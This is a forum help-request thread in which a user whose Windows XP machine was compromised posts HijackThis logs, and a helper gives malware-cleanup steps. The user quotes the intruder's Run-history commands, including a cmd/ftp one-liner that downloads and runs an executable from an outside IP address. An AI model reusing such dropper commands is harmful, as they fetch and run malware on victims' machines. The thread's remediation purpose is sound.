Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Hacker On My System!


  • Please log in to reply
1 reply to this topic

#1 kghastie

kghastie

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:41 PM

Posted 08 January 2007 - 07:30 PM

I have a hacker who has gotten onto my system after I reinstalled the firmware on my D-Link DWI-524 router and presumably left a hole open when I reconfigured it. The hacker was able to open a console and installed some executables in the windows system folder, and open some ftp connections. What should I do!? Comcast is of no help.

I'm pasting my HijackThis log and process/dll list, and I'll try to attach the screenshots I took of the console window that he left open, and some of my Event Viewer logs, which have some activity (including something funny going on with a possibly fake svchost.exe). Actually - is it safe for me to post Event Viewer System logs here?

Any help cleaning/securing my system would be much appreciated, as well as any ideas of how I could avenge myself, legally or vigilante-wise. I have some IP addresses he left....

Here are some of the commands he tried to run from my Run history:

cmd.exe /c del i&echo open 24.11.220.251 11040 > i&echo user 1 1 >> i &echo get 503.exe >> i &echo quit >> i &ftp -n -s:i &503.exe&del i&exit

ftp -i 85.201.69.2 GET winligom.exe

%systemroot%\system32\cmd.exe

get anisim.exe& start anisim.exe& exit



Thanks in advance,


*******************************
********* HijackThis log *********
*******************************

Logfile of HijackThis v1.99.1
Scan saved at 4:33:31 PM, on 1/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
E:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\System32\ezSP_Px.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\EzButton\CplBTQ00.EXE
C:\Program Files\TOSHIBA\Power Management\CePMTray.exe
C:\Program Files\Toshiba Controls\CpRmtKey.EXE
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\TouchPad\TPTray.exe
C:\Program Files\LogMeIn\LogMeInSystray.exe
C:\WINDOWS\ehome\ehmsas.exe
C:\Program Files\Google\Gmail Notifier\gnotify.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
E:\Program Files\Windows Defender\MSASCui.exe
C:\WINDOWS\system32\RUNDLL32.EXE
E:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\WINDOWS\System32\DVDRAMSV.exe
C:\WINDOWS\ehome\ehSched.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\LogMeIn\RaMaint.exe
C:\Program Files\LogMeIn\LogMeIn.exe
C:\recycler\sis\msn\svchost.exe
E:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\ftp.exe
C:\WINDOWS\system32\mmc.exe
C:\Program Files\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\Adobe\Photoshop 7.0\Photoshop.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\mmc.exe
C:\WINDOWS\winhlp32.exe
C:\WINDOWS\system32\taskmgr.exe
C:\DOCUME~1\LAUNCH~1\LOCALS~1\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshiba.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.toshiba.com/
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
F2 - REG:system.ini: Shell=
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: SecurityToolbar - {736b5468-bdad-41be-92d0-22ae2ddf7bcb} - C:\Program Files\Security Toolbar\Security Toolbar.dll
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [CplBTQ00] C:\Program Files\EzButton\CplBTQ00.EXE
O4 - HKLM\..\Run: [CeEPOWER] C:\Program Files\TOSHIBA\Power Management\CePMTray.exe
O4 - HKLM\..\Run: [CpRmtKey] "C:\Program Files\Toshiba Controls\CpRmtKey.EXE"
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O4 - HKLM\..\Run: [TPNF] C:\Program Files\TOSHIBA\TouchPad\TPTray.exe
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /Consumer
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\LogMeInSystray.exe"
O4 - HKLM\..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKLM\..\Run: [{0228e555-4f9c-4e35-a3ec-b109a192b4c2}] C:\Program Files\Google\Gmail Notifier\gnotify.exe
O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Executive Software\Diskeeper\DkIcon.exe"
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [Windows Defender] "E:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [iTunesHelper] "E:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [value] scvhost.exe
O4 - HKLM\..\Run: [Winlogon] c:\recycler\sis\msn\svchost.exe
O4 - HKLM\..\RunServices: [value] scvhost.exe
O4 - HKCU\..\Run: [FreeRAM XP] "e:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe" -win
O4 - HKCU\..\Run: [value] scvhost.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Shareaza.lnk = E:\Program Files\Shareaza\Shareaza.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Save with Download Manager... - file://E:\Program Files\J River\Media Center 11\DMDownload.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.toshiba.com
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1141793772593
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/games/web_...aploader_v6.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: LMIinit - C:\WINDOWS\SYSTEM32\LMIinit.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: Apache2 - Unknown owner - E:\WebServ\apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation Service (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\Diskeeper\DkService.exe
O23 - Service: DVD-RAM_Service - Matsubleepa Electric Industrial Co., Ltd. - C:\WINDOWS\System32\DVDRAMSV.exe
O23 - Service: GhostStartService - Symantec Corporation - C:\PROGRA~1\Symantec\NORTON~1\GHOSTS~2.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\LogMeIn.exe
O23 - Service: MySQL - Unknown owner - E:\WebServ\mysql\bin\mysqld-nt".exe (file missing)
O23 - Service: Norton AntiVirus Auto Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

*******************************
***** HijackThis processlist.txt *****
*******************************

Process list saved on 4:38:48 PM, on 1/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)

[pid] [full path to filename] [file version] [company name]
728 C:\WINDOWS\System32\smss.exe 5.1.2600.2180 Microsoft Corporation
816 C:\WINDOWS\system32\winlogon.exe 5.1.2600.2180 Microsoft Corporation
864 C:\WINDOWS\system32\services.exe 5.1.2600.2180 Microsoft Corporation
876 C:\WINDOWS\system32\lsass.exe 5.1.2600.2180 Microsoft Corporation
1052 C:\WINDOWS\system32\svchost.exe 5.1.2600.2180 Microsoft Corporation
1228 E:\Program Files\Windows Defender\MsMpEng.exe 1.1.1593.0 Microsoft Corporation
1268 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
1756 C:\WINDOWS\system32\spoolsv.exe 5.1.2600.2696 Microsoft Corporation
236 C:\WINDOWS\Explorer.EXE 6.0.2900.2180 Microsoft Corporation
412 C:\WINDOWS\ehome\ehtray.exe 5.1.2600.2180 Microsoft Corporation
648 C:\WINDOWS\System32\ezSP_Px.exe 1.0.0.0 Easy Systems Japan Ltd.
656 C:\Program Files\Common Files\Symantec Shared\ccApp.exe 1.0.10.6 Symantec Corporation
576 C:\Program Files\EzButton\CplBTQ00.EXE 1.2.1.0 Dritek System Inc.
676 C:\Program Files\TOSHIBA\Power Management\CePMTray.exe 1.0.0.23 COMPAL ELECTRONIC INC.
684 C:\Program Files\Toshiba Controls\CpRmtKey.EXE 1.1.0.1 Dritek System Inc.
764 C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe 2.0.0.16 COMPAL ELECTRONIC INC.
792 C:\Program Files\TOSHIBA\TouchPad\TPTray.exe 1.0.0.11 COMPAL ELECTRONIC INC.
1168 C:\Program Files\LogMeIn\LogMeInSystray.exe 2.30.0.555 LogMeIn, Inc.
1204 C:\WINDOWS\ehome\ehmsas.exe 5.1.2600.2180 Microsoft Corporation
1216 C:\Program Files\Google\Gmail Notifier\gnotify.exe 1.0.25.0 Google Inc.
1304 C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe 4.2006.1008.2039 Google
1348 E:\Program Files\Windows Defender\MSASCui.exe 1.1.1593.0 Microsoft Corporation
1420 C:\WINDOWS\system32\RUNDLL32.EXE 5.1.2600.2180 Microsoft Corporation
1468 E:\Program Files\iTunes\iTunesHelper.exe 7.0.0.70 Apple Computer, Inc.
1612 C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe 4.2006.1008.2039 Google
340 C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe 4.2006.1008.2039 Google
2012 C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe 1.0.3.4 Symantec Corporation
1700 C:\WINDOWS\system32\cisvc.exe 5.1.2600.2180 Microsoft Corporation
1828 C:\Program Files\Executive Software\Diskeeper\DkService.exe 9.0.515.0 Executive Software International, Inc.
2100 C:\WINDOWS\System32\DVDRAMSV.exe 2.0.6.0 Matsubleepa Electric Industrial Co., Ltd.
2140 C:\WINDOWS\ehome\ehSched.exe 5.1.2600.2180 Microsoft Corporation
2200 C:\WINDOWS\system32\inetsrv\inetinfo.exe 5.1.2600.2180 Microsoft Corporation
2268 C:\Program Files\LogMeIn\RaMaint.exe 2.30.0.555 LogMeIn, Inc.
2360 C:\Program Files\LogMeIn\LogMeIn.exe 2.30.0.555 LogMeIn, Inc.
2720 C:\recycler\sis\msn\svchost.exe 6.0.3.0 mIRC Co. Ltd.
2728 E:\Program Files\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe 1.5.1.0 YourWare Solutions ™
2856 C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE 7.0.9466.0 Microsoft Corporation
2888 C:\WINDOWS\system32\nvsvc32.exe 6.14.10.9371 NVIDIA Corporation
3176 C:\Program Files\RealVNC\VNC4\WinVNC4.exe 4.1.1.0 RealVNC Ltd.
3584 C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe 2005.1.2.20 Symantec Corporation
2500 C:\Program Files\iPod\bin\iPodService.exe 7.0.0.70 Apple Computer, Inc.
1788 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
2000 C:\WINDOWS\system32\cidaemon.exe 5.1.2600.0 Microsoft Corporation
1120 C:\WINDOWS\system32\cidaemon.exe 5.1.2600.0 Microsoft Corporation
3856 C:\Program Files\Mozilla Firefox\firefox.exe 1.8.20061.20418 Mozilla Corporation
328 C:\WINDOWS\system32\cmd.exe 5.1.2600.2180 Microsoft Corporation
3684 C:\WINDOWS\system32\ftp.exe 5.1.2600.2180 Microsoft Corporation
544 C:\WINDOWS\system32\mmc.exe 5.1.2600.2180 Microsoft Corporation
300 C:\Program Files\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe 6.2.0.208 Lavasoft Sweden
3676 C:\Program Files\WinRAR\WinRAR.exe 3.51.0.0
4012 C:\Program Files\Adobe\Photoshop 7.0\Photoshop.exe 7.0.0.0 Adobe Systems, Incorporated
2996 C:\WINDOWS\System32\svchost.exe 5.1.2600.2180 Microsoft Corporation
2912 C:\WINDOWS\system32\mmc.exe 5.1.2600.2180 Microsoft Corporation
2756 C:\WINDOWS\winhlp32.exe 5.1.2600.2180 Microsoft Corporation
336 C:\WINDOWS\system32\taskmgr.exe 5.1.2600.2180 Microsoft Corporation
1160 C:\DOCUME~1\LAUNCH~1\LOCALS~1\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe 1.99.0.1 Soeperman Enterprises Ltd.


DLLs loaded by process E:\Program Files\Windows Defender\MsMpEng.exe:

[full path to filename] [file version] [company name]
C:\WINDOWS\system32\ntdll.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\kernel32.dll 5.1.2600.2945 Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\MSVCR80.dll 8.0.-14809.42 Microsoft Corporation
C:\WINDOWS\system32\msvcrt.dll 7.0.2600.2180 Microsoft Corporation
E:\Program Files\Windows Defender\MpSvc.dll 1.1.1593.0 Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\MSVCP80.dll 8.0.-14809.42 Microsoft Corporation
C:\WINDOWS\system32\ADVAPI32.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\RPCRT4.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\VERSION.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\CRYPT32.dll 5.131.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\USER32.dll 5.1.2600.2622 Microsoft Corporation
C:\WINDOWS\system32\GDI32.dll 5.1.2600.2818 Microsoft Corporation
C:\WINDOWS\system32\MSASN1.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\WINTRUST.dll 5.131.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\IMAGEHLP.dll 5.1.2600.2180 Microsoft Corporation
E:\Program Files\Windows Defender\MpClient.dll 1.1.1593.0 Microsoft Corporation
C:\WINDOWS\system32\SHELL32.dll 6.0.2900.2951 Microsoft Corporation
C:\WINDOWS\system32\SHLWAPI.dll 6.0.2900.3020 Microsoft Corporation
C:\WINDOWS\system32\ole32.dll 5.1.2600.2726 Microsoft Corporation
C:\WINDOWS\system32\OLEAUT32.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\USERENV.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll 6.0.2900.2982 Microsoft Corporation
C:\WINDOWS\system32\comctl32.dll 5.82.2900.2982 Microsoft Corporation
C:\WINDOWS\system32\rsaenh.dll 5.1.2600.2161 Microsoft Corporation
C:\WINDOWS\system32\xpsp2res.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\secur32.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\netapi32.dll 5.1.2600.2976 Microsoft Corporation
C:\Documents and Settings\All Users\Application Data\Microsoft\Windows Defender\Definition Updates\{CC548586-404E-41A6-B8DF-536BFBA8E3AC}\mpengine.dll 1.1.1904.0 Microsoft Corporation
C:\WINDOWS\system32\PSAPI.DLL 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\WS2_32.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\WS2HELP.dll 5.1.2600.2180 Microsoft Corporation
C:\WINDOWS\system32\iphlpapi.dll 5.1.2600.2912 Microsoft Corporation
E:\Program Files\Windows Defender\mprtplug.dll 1.1.1593.0 Microsoft Corporation
C:\WINDOWS\system32\uxtheme.dll 6.0.2900.2180 Microsoft Corporation
C:\WINDOWS\system32\CLBCATQ.DLL 2001.12.4414.308 Microsoft Corporation
C:\WINDOWS\system32\COMRes.dll 2001.12.4414.258 Microsoft Corporation
C:\WINDOWS\system32\Apphelp.dll 5.1.2600.2180 Microsoft Corporation

BC AdBot (Login to Remove)

 


m

#2 MFDnSC

MFDnSC

    Ret. Director I/T


  • Members
  • 4,310 posts
  • OFFLINE
  •  
  • Local time:09:41 PM

Posted 08 January 2007 - 08:28 PM

You may want to print this or save it to notepad as we will go to safe mode.

Fix these with HiJackThis – mark them, close IE, click fix checked

O4 - HKLM\..\Run: [value] scvhost.exe

O4 - HKLM\..\Run: [Winlogon] c:\recycler\sis\msn\svchost.exe

O4 - HKLM\..\RunServices: [value] scvhost.exe

O4 - HKCU\..\Run: [value] scvhost.exe

DownLoad http://www.downloads.subratam.org/KillBox.zip or
http://www.thespykiller.co.uk/files/killbox.exe

Restart your computer into safe mode now. (Tapping F8 at the first black screen) Perform the following steps in safe mode:

Double-click on Killbox.exe to run it. Now put a tick by Standard File Kill. In the "Full Path of File to Delete" box, copy and paste each of the following lines one at a time then click on the button that has the red circle with the X in the middle after you enter each file. It will ask for confimation to delete the file. Click Yes. Continue with that same procedure until you have copied and pasted all of these in the "Paste Full Path of File to Delete" box.

c:\recycler\sis
C:\WINDOWS\System32\scvhost.exe

Note: It is possible that Killbox will tell you that one or more files do not exist. If that happens, just continue on with all the files. Be sure you don't miss any.

START – RUN – type in %temp% - OK - Edit – Select all – File – Delete

Delete everything in the C:\Windows\Temp folder or C:\WINNT\temp

Not all temp files will delete and that is normal
Empty the recycle bin
Boot


Download Superantispyware

http://www.superantispyware.com/superantis...efreevspro.html

Install it and double-click the icon on your desktop to run it.
· It will ask if you want to update the program definitions, click Yes.
· Under Configuration and Preferences, click the Preferences button.
· Click the Scanning Control tab.
· Under Scanner Options make sure the following are checked:
o Close browsers before scanning
o Scan for tracking cookies
o Terminate memory threats before quarantining.
o Please leave the others unchecked.
o Click the Close button to leave the control center screen.
· On the main screen, under Scan for Harmful Software click Scan your computer.
· On the left check C:\Fixed Drive.
· On the right, under Complete Scan, choose Perform Complete Scan.
· Click Next to start the scan. Please be patient while it scans your computer.
· After the scan is complete a summary box will appear. Click OK.
· Make sure everything in the white box has a check next to it, then click Next.
· It will quarantine what it found and if it asks if you want to reboot, click Yes.
· To retrieve the removal information for me please do the following:
o After reboot, double-click the SUPERAntispyware icon on your desktop.
o Click Preferences. Click the Statistics/Logs tab.
o Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
o It will open in your default text editor (such as Notepad/Wordpad).
o Please highlight everything in the notepad, then right-click and choose copy.
· Click close and close again to exit the program.
· Please paste that information here for me with a new HijackThis log.


Please give feedback on what worked/didn’t work and the current status of your system
"Nothing could be finer than to be in South Carolina ............"

Member ASAP




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users